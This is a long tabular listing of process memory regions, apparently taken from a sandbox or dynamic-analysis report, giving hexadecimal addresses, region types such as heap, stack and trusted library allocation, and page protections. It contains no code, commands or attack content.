||
5DDB000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
594A000
|
heap
|
page read and write
|
||
48F3000
|
trusted library allocation
|
page read and write
|
||
6FC0000
|
heap
|
page read and write
|
||
5DD0000
|
trusted library allocation
|
page read and write
|
||
4510000
|
heap
|
page read and write
|
||
5785000
|
heap
|
page read and write
|
||
5C66000
|
heap
|
page read and write
|
||
7250000
|
trusted library allocation
|
page execute and read and write
|
||
84DE000
|
stack
|
page read and write
|
||
75B0000
|
trusted library allocation
|
page read and write
|
||
8665000
|
heap
|
page read and write
|
||
5658000
|
heap
|
page read and write
|
||
5858000
|
trusted library allocation
|
page read and write
|
||
711E000
|
stack
|
page read and write
|
||
919000
|
heap
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
771E000
|
stack
|
page read and write
|
||
76E5000
|
heap
|
page read and write
|
||
751E000
|
stack
|
page read and write
|
||
80E000
|
heap
|
page read and write
|
||
5894000
|
heap
|
page read and write
|
||
64FE000
|
trusted library allocation
|
page read and write
|
||
4548000
|
heap
|
page read and write
|
||
7142000
|
heap
|
page read and write
|
||
3068000
|
heap
|
page read and write
|
||
70DE000
|
stack
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
6E2A000
|
stack
|
page read and write
|
||
297C000
|
heap
|
page read and write
|
||
86C000
|
heap
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
57CE000
|
heap
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
5709000
|
heap
|
page read and write
|
||
48C4000
|
trusted library allocation
|
page read and write
|
||
564E000
|
heap
|
page read and write
|
||
7320000
|
trusted library allocation
|
page read and write
|
||
82D0000
|
heap
|
page read and write
|
||
902000
|
heap
|
page read and write
|
||
7970000
|
trusted library allocation
|
page read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
4AAC000
|
trusted library allocation
|
page read and write
|
||
2AA8000
|
heap
|
page read and write
|
||
4B7E000
|
stack
|
page read and write
|
||
4DAC000
|
heap
|
page read and write
|
||
68AE000
|
stack
|
page read and write
|
||
651E000
|
trusted library allocation
|
page read and write
|
||
2A92000
|
heap
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
838000
|
heap
|
page read and write
|
||
2FB9000
|
trusted library allocation
|
page read and write
|
||
787F000
|
stack
|
page read and write
|
||
60DF000
|
heap
|
page read and write
|
||
5C66000
|
heap
|
page read and write
|
||
168E000
|
stack
|
page read and write
|
||
6B5A000
|
stack
|
page read and write
|
||
29F0000
|
heap
|
page read and write
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
5C2F000
|
heap
|
page read and write
|
||
D40000
|
direct allocation
|
page read and write
|
||
4280000
|
trusted library allocation
|
page read and write
|
||
486A000
|
trusted library allocation
|
page read and write
|
||
2A43000
|
heap
|
page read and write
|
||
8F0000
|
heap
|
page read and write
|
||
7458000
|
heap
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
1330000
|
heap
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
82BD000
|
stack
|
page read and write
|
||
4A90000
|
trusted library allocation
|
page read and write
|
||
6FE8000
|
heap
|
page read and write
|
||
6113000
|
heap
|
page read and write
|
||
587E000
|
trusted library allocation
|
page read and write
|
||
2DD6000
|
heap
|
page read and write
|
||
2CF7000
|
heap
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
734C000
|
heap
|
page read and write
|
||
847000
|
heap
|
page read and write
|
||
4AA6000
|
trusted library allocation
|
page read and write
|
||
7310000
|
trusted library allocation
|
page read and write
|
||
FF0000
|
heap
|
page read and write
|
||
29CE000
|
heap
|
page read and write
|
||
7448000
|
heap
|
page read and write
|
||
4850000
|
heap
|
page execute and read and write
|
||
1F0000
|
heap
|
page read and write
|
||
5813000
|
trusted library allocation
|
page read and write
|
||
8150000
|
heap
|
page read and write
|
||
5C5B000
|
heap
|
page read and write
|
||
6171000
|
heap
|
page read and write
|
||
6E85000
|
heap
|
page execute and read and write
|
||
6C1C000
|
stack
|
page read and write
|
||
84BF000
|
stack
|
page read and write
|
||
5663000
|
heap
|
page read and write
|
||
57F1000
|
trusted library allocation
|
page read and write
|
||
84D0000
|
trusted library allocation
|
page read and write
|
||
6177000
|
heap
|
page read and write
|
||
5C18000
|
heap
|
page read and write
|
||
5C17000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7640000
|
heap
|
page read and write
|
||
7790000
|
trusted library allocation
|
page read and write
|
||
2C50000
|
heap
|
page read and write
|
||
45A2000
|
trusted library allocation
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
7435000
|
heap
|
page read and write
|
||
2A01000
|
heap
|
page read and write
|
||
5D69000
|
trusted library allocation
|
page read and write
|
||
5571000
|
heap
|
page read and write
|
||
7286000
|
trusted library allocation
|
page read and write
|
||
7724000
|
heap
|
page read and write
|
||
4BB0000
|
heap
|
page read and write
|
||
2A86000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
734E000
|
stack
|
page read and write
|
||
31AD000
|
heap
|
page read and write
|
||
5950000
|
heap
|
page read and write
|
||
4AEE000
|
stack
|
page read and write
|
||
2D3E000
|
stack
|
page read and write
|
||
55B2000
|
heap
|
page read and write
|
||
882000
|
heap
|
page read and write
|
||
72E0000
|
trusted library allocation
|
page read and write
|
||
84C0000
|
trusted library allocation
|
page read and write
|
||
682E000
|
stack
|
page read and write
|
||
58C8000
|
trusted library allocation
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
728B000
|
stack
|
page read and write
|
||
7930000
|
trusted library allocation
|
page read and write
|
||
5E30000
|
trusted library allocation
|
page execute
|
||
8FF000
|
heap
|
page read and write
|
||
7920000
|
trusted library allocation
|
page read and write
|
||
2A28000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
805000
|
heap
|
page read and write
|
||
504D000
|
stack
|
page read and write
|
||
76F7000
|
heap
|
page read and write
|
||
6FF7000
|
heap
|
page read and write
|
||
6BE0000
|
heap
|
page read and write
|
||
7444000
|
heap
|
page read and write
|
||
465E000
|
stack
|
page read and write
|
||
29E1000
|
heap
|
page read and write
|
||
4E90000
|
heap
|
page read and write
|
||
5670000
|
heap
|
page read and write
|
||
5786000
|
heap
|
page read and write
|
||
4D91000
|
heap
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
74F1000
|
heap
|
page read and write
|
||
72C0000
|
trusted library allocation
|
page read and write
|
||
2C6C000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
2850000
|
heap
|
page read and write
|
||
2A38000
|
heap
|
page read and write
|
||
6D59000
|
heap
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
2D17000
|
heap
|
page read and write
|
||
5C66000
|
heap
|
page read and write
|
||
724C000
|
stack
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
5F5F000
|
heap
|
page read and write
|
||
4650000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
84FE000
|
stack
|
page read and write
|
||
90A000
|
heap
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
6ECE000
|
stack
|
page read and write
|
||
835000
|
heap
|
page read and write
|
||
6143000
|
heap
|
page read and write
|
||
6EB0000
|
heap
|
page read and write
|
||
60AF000
|
heap
|
page read and write
|
||
293E000
|
heap
|
page read and write
|
||
61F4000
|
trusted library allocation
|
page read and write
|
||
7039000
|
heap
|
page read and write
|
||
6171000
|
heap
|
page read and write
|
||
79B0000
|
trusted library allocation
|
page read and write
|
||
4DE4000
|
heap
|
page read and write
|
||
5C24000
|
heap
|
page read and write
|
||
4F7E000
|
stack
|
page read and write
|
||
8612000
|
heap
|
page read and write
|
||
805000
|
heap
|
page read and write
|
||
705D000
|
heap
|
page read and write
|
||
4D8F000
|
stack
|
page read and write
|
||
2CBA000
|
heap
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
CCF000
|
stack
|
page read and write
|
||
8510000
|
trusted library allocation
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
5A2B000
|
trusted library allocation
|
page read and write
|
||
7250000
|
trusted library allocation
|
page read and write
|
||
4815000
|
trusted library allocation
|
page read and write
|
||
72FF000
|
trusted library allocation
|
page read and write
|
||
5C24000
|
heap
|
page read and write
|
||
91D000
|
heap
|
page read and write
|
||
470E000
|
stack
|
page read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
7F0E0000
|
trusted library allocation
|
page execute and read and write
|
||
5061000
|
trusted library allocation
|
page read and write
|
||
4950000
|
heap
|
page read and write
|
||
669F000
|
stack
|
page read and write
|
||
2D39000
|
heap
|
page read and write
|
||
6113000
|
heap
|
page read and write
|
||
8B0000
|
heap
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
923000
|
heap
|
page read and write
|
||
6117000
|
heap
|
page read and write
|
||
78FD000
|
stack
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
832000
|
heap
|
page read and write
|
||
4858000
|
trusted library allocation
|
page read and write
|
||
5630000
|
heap
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
84E000
|
heap
|
page read and write
|
||
76DF000
|
stack
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
30F0000
|
heap
|
page read and write
|
||
2AA9000
|
heap
|
page read and write
|
||
3178000
|
heap
|
page read and write
|
||
719D000
|
stack
|
page read and write
|
||
709F000
|
stack
|
page read and write
|
||
4DBC000
|
heap
|
page read and write
|
||
4B3F000
|
stack
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page read and write
|
||
4730000
|
trusted library allocation
|
page read and write
|
||
587A000
|
trusted library allocation
|
page read and write
|
||
519E000
|
stack
|
page read and write
|
||
8320000
|
trusted library allocation
|
page read and write
|
||
29E1000
|
heap
|
page read and write
|
||
586E000
|
heap
|
page read and write
|
||
2A35000
|
heap
|
page read and write
|
||
8E7000
|
heap
|
page read and write
|
||
30DE000
|
stack
|
page read and write
|
||
278C000
|
stack
|
page read and write
|
||
2D3C000
|
heap
|
page read and write
|
||
55DB000
|
stack
|
page read and write
|
||
4DBC000
|
heap
|
page read and write
|
||
57A1000
|
trusted library allocation
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
71FE000
|
stack
|
page read and write
|
||
5785000
|
heap
|
page read and write
|
||
7058000
|
heap
|
page read and write
|
||
2B49000
|
heap
|
page read and write
|
||
739F000
|
stack
|
page read and write
|
||
8652000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
5841000
|
heap
|
page read and write
|
||
7760000
|
trusted library allocation
|
page read and write
|
||
25F6000
|
stack
|
page read and write
|
||
2A82000
|
heap
|
page read and write
|
||
4A80000
|
trusted library allocation
|
page execute and read and write
|
||
2C39000
|
heap
|
page read and write
|
||
4262000
|
trusted library allocation
|
page read and write
|
||
77EA000
|
trusted library allocation
|
page read and write
|
||
4F3E000
|
stack
|
page read and write
|
||
2AAB000
|
heap
|
page read and write
|
||
835000
|
heap
|
page read and write
|
||
884C000
|
stack
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
90A000
|
heap
|
page read and write
|
||
7EC000
|
heap
|
page read and write
|
||
47AE000
|
stack
|
page read and write
|
||
7746000
|
heap
|
page read and write
|
||
2BAE000
|
stack
|
page read and write
|
||
303E000
|
stack
|
page read and write
|
||
6174000
|
heap
|
page read and write
|
||
73B0000
|
heap
|
page execute and read and write
|
||
701F000
|
heap
|
page read and write
|
||
5671000
|
heap
|
page read and write
|
||
2A82000
|
heap
|
page read and write
|
||
6108000
|
heap
|
page read and write
|
||
76DB000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
4FC0000
|
trusted library allocation
|
page read and write
|
||
4B40000
|
heap
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
6DED000
|
stack
|
page read and write
|
||
836000
|
heap
|
page read and write
|
||
56C4000
|
heap
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
4710000
|
trusted library allocation
|
page execute and read and write
|
||
8ED000
|
heap
|
page read and write
|
||
28D0000
|
heap
|
page read and write
|
||
7304000
|
trusted library allocation
|
page read and write
|
||
8643000
|
heap
|
page read and write
|
||
29F1000
|
heap
|
page read and write
|
||
6171000
|
heap
|
page read and write
|
||
74DE000
|
stack
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
7640000
|
trusted library allocation
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
46CC000
|
stack
|
page read and write
|
||
7A0000
|
direct allocation
|
page read and write
|
||
83D0000
|
trusted library allocation
|
page execute and read and write
|
||
5C41000
|
heap
|
page read and write
|
||
61CB000
|
heap
|
page read and write
|
||
73A0000
|
heap
|
page read and write
|
||
7289000
|
heap
|
page read and write
|
||
5887000
|
trusted library allocation
|
page read and write
|
||
60A8000
|
heap
|
page read and write
|
||
72CE000
|
stack
|
page read and write
|
||
29F3000
|
heap
|
page read and write
|
||
29B0000
|
heap
|
page read and write
|
||
55BD000
|
heap
|
page read and write
|
||
5861000
|
trusted library allocation
|
page read and write
|
||
730E000
|
stack
|
page read and write
|
||
5FA000
|
stack
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
2A02000
|
heap
|
page read and write
|
||
ACE000
|
stack
|
page read and write
|
||
4CBC000
|
trusted library allocation
|
page read and write
|
||
574B000
|
heap
|
page read and write
|
||
5C25000
|
heap
|
page read and write
|
||
2AAA000
|
heap
|
page read and write
|
||
2A28000
|
heap
|
page read and write
|
||
74BA000
|
heap
|
page read and write
|
||
4DC9000
|
heap
|
page read and write
|
||
7359000
|
heap
|
page read and write
|
||
6113000
|
heap
|
page read and write
|
||
4D94000
|
heap
|
page read and write
|
||
4573000
|
trusted library allocation
|
page execute and read and write
|
||
701B000
|
stack
|
page read and write
|
||
2A32000
|
heap
|
page read and write
|
||
4574000
|
trusted library allocation
|
page read and write
|
||
2A50000
|
heap
|
page read and write
|
||
77E7000
|
trusted library allocation
|
page read and write
|
||
5785000
|
heap
|
page read and write
|
||
5663000
|
heap
|
page read and write
|
||
4ADC000
|
trusted library allocation
|
page read and write
|
||
5C38000
|
heap
|
page read and write
|
||
5785000
|
heap
|
page read and write
|
||
D60000
|
direct allocation
|
page read and write
|
||
2A3A000
|
heap
|
page read and write
|
||
52F0000
|
heap
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
6D2B000
|
stack
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
77C0000
|
trusted library allocation
|
page read and write
|
||
591B000
|
heap
|
page read and write
|
||
7940000
|
trusted library allocation
|
page read and write
|
||
901000
|
heap
|
page read and write
|
||
7830000
|
trusted library allocation
|
page read and write
|
||
4DE2000
|
heap
|
page read and write
|
||
5785000
|
heap
|
page read and write
|
||
559F000
|
stack
|
page read and write
|
||
4820000
|
heap
|
page read and write
|
||
56DC000
|
stack
|
page read and write
|
||
51EE000
|
stack
|
page read and write
|
||
55B3000
|
heap
|
page read and write
|
||
12FD000
|
stack
|
page read and write
|
||
2A82000
|
heap
|
page read and write
|
||
51D7000
|
trusted library allocation
|
page read and write
|
||
70DE000
|
stack
|
page read and write
|
||
804000
|
heap
|
page read and write
|
||
76D3000
|
heap
|
page read and write
|
||
83EE000
|
stack
|
page read and write
|
||
2900000
|
trusted library allocation
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
6021000
|
heap
|
page read and write
|
||
5C66000
|
heap
|
page read and write
|
||
4827000
|
trusted library allocation
|
page read and write
|
||
746E000
|
stack
|
page read and write
|
||
8FD000
|
heap
|
page read and write
|
||
533E000
|
stack
|
page read and write
|
||
637000
|
stack
|
page read and write
|
||
48AC000
|
stack
|
page read and write
|
||
160000
|
heap
|
page read and write
|
||
5C3C000
|
heap
|
page read and write
|
||
589C000
|
heap
|
page read and write
|
||
3030000
|
trusted library allocation
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
7591000
|
heap
|
page read and write
|
||
735E000
|
stack
|
page read and write
|
||
7610000
|
trusted library allocation
|
page read and write
|
||
4A70000
|
heap
|
page read and write
|
||
5A3B000
|
trusted library allocation
|
page read and write
|
||
5935000
|
heap
|
page read and write
|
||
6118000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3050000
|
trusted library allocation
|
page read and write
|
||
29E1000
|
heap
|
page read and write
|
||
3060000
|
heap
|
page read and write
|
||
6A1D000
|
stack
|
page read and write
|
||
847000
|
heap
|
page read and write
|
||
29BD000
|
stack
|
page read and write
|
||
D6E000
|
direct allocation
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
4A7E000
|
trusted library allocation
|
page read and write
|
||
6177000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
593C000
|
heap
|
page read and write
|
||
77B0000
|
trusted library allocation
|
page read and write
|
||
6187000
|
heap
|
page read and write
|
||
41EE000
|
stack
|
page read and write
|
||
5C66000
|
heap
|
page read and write
|
||
923000
|
heap
|
page read and write
|
||
8230000
|
trusted library allocation
|
page execute and read and write
|
||
5C66000
|
heap
|
page read and write
|
||
48CC000
|
trusted library allocation
|
page read and write
|
||
5789000
|
heap
|
page read and write
|
||
59B000
|
stack
|
page read and write
|
||
703F000
|
heap
|
page read and write
|
||
85A0000
|
trusted library allocation
|
page read and write
|
||
29D9000
|
heap
|
page read and write
|
||
72F0000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
611A000
|
heap
|
page read and write
|
||
593B000
|
heap
|
page read and write
|
||
589D000
|
heap
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
945000
|
heap
|
page read and write
|
||
75D0000
|
trusted library allocation
|
page read and write
|
||
90A000
|
heap
|
page read and write
|
||
860000
|
heap
|
page read and write
|
||
595F000
|
heap
|
page read and write
|
||
865D000
|
heap
|
page read and write
|
||
721D000
|
stack
|
page read and write
|
||
90D000
|
heap
|
page read and write
|
||
4DC1000
|
heap
|
page read and write
|
||
CF0000
|
direct allocation
|
page read and write
|
||
4265000
|
trusted library allocation
|
page execute and read and write
|
||
48BE000
|
trusted library allocation
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
85D0000
|
heap
|
page read and write
|
||
8E7000
|
heap
|
page read and write
|
||
49E8000
|
trusted library allocation
|
page read and write
|
||
594A000
|
heap
|
page read and write
|
||
7560000
|
heap
|
page execute and read and write
|
||
8590000
|
trusted library allocation
|
page execute and read and write
|
||
60C8000
|
trusted library allocation
|
page read and write
|
||
620C000
|
trusted library allocation
|
page read and write
|
||
76A3000
|
heap
|
page read and write
|
||
6173000
|
heap
|
page read and write
|
||
2FAD000
|
trusted library allocation
|
page execute and read and write
|
||
4861000
|
trusted library allocation
|
page read and write
|
||
5C3B000
|
heap
|
page read and write
|
||
4DDD000
|
heap
|
page read and write
|
||
297E000
|
stack
|
page read and write
|
||
7770000
|
trusted library allocation
|
page execute and read and write
|
||
72FF000
|
heap
|
page read and write
|
||
901000
|
heap
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
154E000
|
stack
|
page read and write
|
||
5787000
|
heap
|
page read and write
|
||
7780000
|
trusted library allocation
|
page read and write
|
||
2B5D000
|
stack
|
page read and write
|
||
7650000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
4C8E000
|
stack
|
page read and write
|
||
5889000
|
trusted library allocation
|
page read and write
|
||
311E000
|
heap
|
page read and write
|
||
51B7000
|
trusted library allocation
|
page read and write
|
||
275E000
|
stack
|
page read and write
|
||
73E0000
|
heap
|
page read and write
|
||
90F000
|
heap
|
page read and write
|
||
83E0000
|
trusted library allocation
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
51C8000
|
trusted library allocation
|
page read and write
|
||
5C5B000
|
heap
|
page read and write
|
||
6214000
|
trusted library allocation
|
page read and write
|
||
6D90000
|
heap
|
page read and write
|
||
4850000
|
trusted library allocation
|
page read and write
|
||
45A0000
|
trusted library allocation
|
page read and write
|
||
7FD000
|
heap
|
page read and write
|
||
591B000
|
heap
|
page read and write
|
||
4660000
|
heap
|
page readonly
|
||
72A0000
|
trusted library allocation
|
page read and write
|
||
29B8000
|
heap
|
page read and write
|
||
853E000
|
stack
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
6E7E000
|
stack
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
68EE000
|
stack
|
page read and write
|
||
2A03000
|
heap
|
page read and write
|
||
45C0000
|
trusted library allocation
|
page read and write
|
||
7260000
|
trusted library allocation
|
page read and write
|
||
594D000
|
heap
|
page read and write
|
||
5C2B000
|
heap
|
page read and write
|
||
6143000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
6A7D000
|
stack
|
page read and write
|
||
6111000
|
heap
|
page read and write
|
||
2A93000
|
heap
|
page read and write
|
||
1960000
|
heap
|
page read and write
|
||
740000
|
direct allocation
|
page read and write
|
||
591C000
|
heap
|
page read and write
|
||
49F0000
|
heap
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
594D000
|
heap
|
page read and write
|
||
5935000
|
heap
|
page read and write
|
||
7270000
|
heap
|
page read and write
|
||
5900000
|
heap
|
page read and write
|
||
5D41000
|
trusted library allocation
|
page read and write
|
||
6B9D000
|
stack
|
page read and write
|
||
29F7000
|
heap
|
page read and write
|
||
6530000
|
trusted library allocation
|
page read and write
|
||
49B000
|
stack
|
page read and write
|
||
2A3A000
|
heap
|
page read and write
|
||
591C000
|
heap
|
page read and write
|
||
591C000
|
heap
|
page read and write
|
||
686E000
|
stack
|
page read and write
|
||
4670000
|
trusted library allocation
|
page read and write
|
||
595E000
|
heap
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
6108000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
2BD0000
|
heap
|
page read and write
|
||
4AF4000
|
heap
|
page read and write
|
||
8220000
|
heap
|
page read and write
|
||
1AE000
|
stack
|
page read and write
|
||
715D000
|
stack
|
page read and write
|
||
4824000
|
heap
|
page read and write
|
||
8EB000
|
heap
|
page read and write
|
||
6E1E000
|
stack
|
page read and write
|
||
2CF3000
|
heap
|
page read and write
|
||
709B000
|
stack
|
page read and write
|
||
5ED0000
|
trusted library allocation
|
page read and write
|
||
7270000
|
trusted library allocation
|
page read and write
|
||
5D49000
|
trusted library allocation
|
page read and write
|
||
74C0000
|
trusted library allocation
|
page execute and read and write
|
||
617E000
|
heap
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
711A000
|
stack
|
page read and write
|
||
549E000
|
stack
|
page read and write
|
||
61A0000
|
heap
|
page read and write
|
||
562F000
|
heap
|
page read and write
|
||
29B8000
|
stack
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
776B000
|
heap
|
page read and write
|
||
4A3C000
|
stack
|
page read and write
|
||
47CF000
|
stack
|
page read and write
|
||
6111000
|
heap
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
6D40000
|
heap
|
page read and write
|
||
6162000
|
heap
|
page read and write
|
||
297C000
|
stack
|
page read and write
|
||
70FE000
|
stack
|
page read and write
|
||
4A7D000
|
stack
|
page read and write
|
||
5C3B000
|
heap
|
page read and write
|
||
6FDD000
|
stack
|
page read and write
|
||
2F2F000
|
stack
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
78BE000
|
stack
|
page read and write
|
||
6E92000
|
heap
|
page read and write
|
||
7D20000
|
trusted library allocation
|
page read and write
|
||
2FD0000
|
trusted library allocation
|
page read and write
|
||
4943000
|
heap
|
page read and write
|
||
838F000
|
stack
|
page read and write
|
||
48B6000
|
trusted library allocation
|
page read and write
|
||
76E2000
|
heap
|
page read and write
|
||
8FD000
|
heap
|
page read and write
|
||
618F000
|
heap
|
page read and write
|
||
809000
|
heap
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
4795000
|
heap
|
page execute and read and write
|
||
744F000
|
heap
|
page read and write
|
||
52EE000
|
stack
|
page read and write
|
||
306A000
|
trusted library allocation
|
page execute and read and write
|
||
294C000
|
heap
|
page read and write
|
||
45A5000
|
trusted library allocation
|
page execute and read and write
|
||
4FA9000
|
trusted library allocation
|
page read and write
|
||
5885000
|
trusted library allocation
|
page read and write
|
||
809000
|
heap
|
page read and write
|
||
4720000
|
trusted library allocation
|
page read and write
|
||
3050000
|
trusted library allocation
|
page execute and read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
5C66000
|
heap
|
page read and write
|
||
755E000
|
stack
|
page read and write
|
||
856000
|
heap
|
page read and write
|
||
2D0E000
|
heap
|
page read and write
|
||
713E000
|
stack
|
page read and write
|
||
2CFE000
|
stack
|
page read and write
|
||
4DA3000
|
trusted library allocation
|
page read and write
|
||
6172000
|
heap
|
page read and write
|
||
2FD2000
|
trusted library allocation
|
page read and write
|
||
6BF0000
|
heap
|
page read and write
|
||
4560000
|
trusted library allocation
|
page read and write
|
||
6CED000
|
stack
|
page read and write
|
||
50F4000
|
trusted library allocation
|
page read and write
|
||
73A0000
|
trusted library allocation
|
page read and write
|
||
2A38000
|
heap
|
page read and write
|
||
70DD000
|
stack
|
page read and write
|
||
76D8000
|
heap
|
page read and write
|
||
484E000
|
stack
|
page read and write
|
||
2A01000
|
heap
|
page read and write
|
||
6D8E000
|
stack
|
page read and write
|
||
4230000
|
trusted library allocation
|
page read and write
|
||
51CE000
|
stack
|
page read and write
|
||
2DBE000
|
stack
|
page read and write
|
||
591B000
|
heap
|
page read and write
|
||
1418000
|
heap
|
page read and write
|
||
8240000
|
trusted library allocation
|
page read and write
|
||
922000
|
heap
|
page read and write
|
||
7E90000
|
heap
|
page read and write
|
||
2B7B000
|
heap
|
page read and write
|
||
5875000
|
trusted library allocation
|
page read and write
|
||
6089000
|
trusted library allocation
|
page read and write
|
||
3040000
|
trusted library allocation
|
page read and write
|
||
3044000
|
trusted library allocation
|
page read and write
|
||
543F000
|
stack
|
page read and write
|
||
4DD8000
|
heap
|
page read and write
|
||
742E000
|
stack
|
page read and write
|
||
4920000
|
heap
|
page read and write
|
||
B5E000
|
stack
|
page read and write
|
||
2D10000
|
trusted library allocation
|
page read and write
|
||
4E98000
|
trusted library allocation
|
page read and write
|
||
709E000
|
stack
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
46DC000
|
stack
|
page read and write
|
||
730A000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
4D41000
|
trusted library allocation
|
page read and write
|
||
5356000
|
trusted library allocation
|
page read and write
|
||
6162000
|
heap
|
page read and write
|
||
5E50000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
2F0E000
|
unkown
|
page read and write
|
||
594A000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
6D9E000
|
stack
|
page read and write
|
||
2910000
|
heap
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page read and write
|
||
2D36000
|
heap
|
page read and write
|
||
2C5D000
|
heap
|
page read and write
|
||
4570000
|
trusted library allocation
|
page read and write
|
||
7F2000
|
heap
|
page read and write
|
||
4D95000
|
heap
|
page read and write
|
||
477E000
|
stack
|
page read and write
|
||
907000
|
heap
|
page read and write
|
||
73B3000
|
heap
|
page read and write
|
||
8050000
|
trusted library allocation
|
page read and write
|
||
B9D000
|
stack
|
page read and write
|
||
7630000
|
trusted library allocation
|
page read and write
|
||
2FCE000
|
stack
|
page read and write
|
||
4D90000
|
heap
|
page read and write
|
||
2FC0000
|
trusted library allocation
|
page read and write
|
||
4DD0000
|
heap
|
page read and write
|
||
6162000
|
heap
|
page read and write
|
||
80CE000
|
stack
|
page read and write
|
||
7050000
|
heap
|
page read and write
|
||
6108000
|
heap
|
page read and write
|
||
6162000
|
heap
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
817B000
|
heap
|
page read and write
|
||
492E000
|
stack
|
page read and write
|
||
2A0D000
|
heap
|
page read and write
|
||
4DB9000
|
heap
|
page read and write
|
||
715E000
|
stack
|
page read and write
|
||
747B000
|
heap
|
page read and write
|
||
82C0000
|
heap
|
page read and write
|
||
6020000
|
heap
|
page read and write
|
||
D30000
|
heap
|
page read and write
|
||
814E000
|
stack
|
page read and write
|
||
7D8000
|
heap
|
page read and write
|
||
29F7000
|
heap
|
page read and write
|
||
5570000
|
heap
|
page read and write
|
||
7950000
|
trusted library allocation
|
page read and write
|
||
5A27000
|
trusted library allocation
|
page read and write
|
||
90A000
|
heap
|
page read and write
|
||
2EE8000
|
heap
|
page read and write
|
||
29E6000
|
heap
|
page read and write
|
||
2FD5000
|
trusted library allocation
|
page execute and read and write
|
||
6177000
|
heap
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
7301000
|
heap
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
27D7000
|
heap
|
page read and write
|
||
83C0000
|
heap
|
page read and write
|
||
589A000
|
heap
|
page read and write
|
||
6A9D000
|
stack
|
page read and write
|
||
4EB5000
|
heap
|
page read and write
|
||
51C0000
|
trusted library allocation
|
page read and write
|
||
30F8000
|
heap
|
page read and write
|
||
763D000
|
stack
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page execute and read and write
|
||
6ADA000
|
stack
|
page read and write
|
||
4C4F000
|
stack
|
page read and write
|
||
8ED000
|
heap
|
page read and write
|
||
5C41000
|
heap
|
page read and write
|
||
4233000
|
trusted library allocation
|
page execute and read and write
|
||
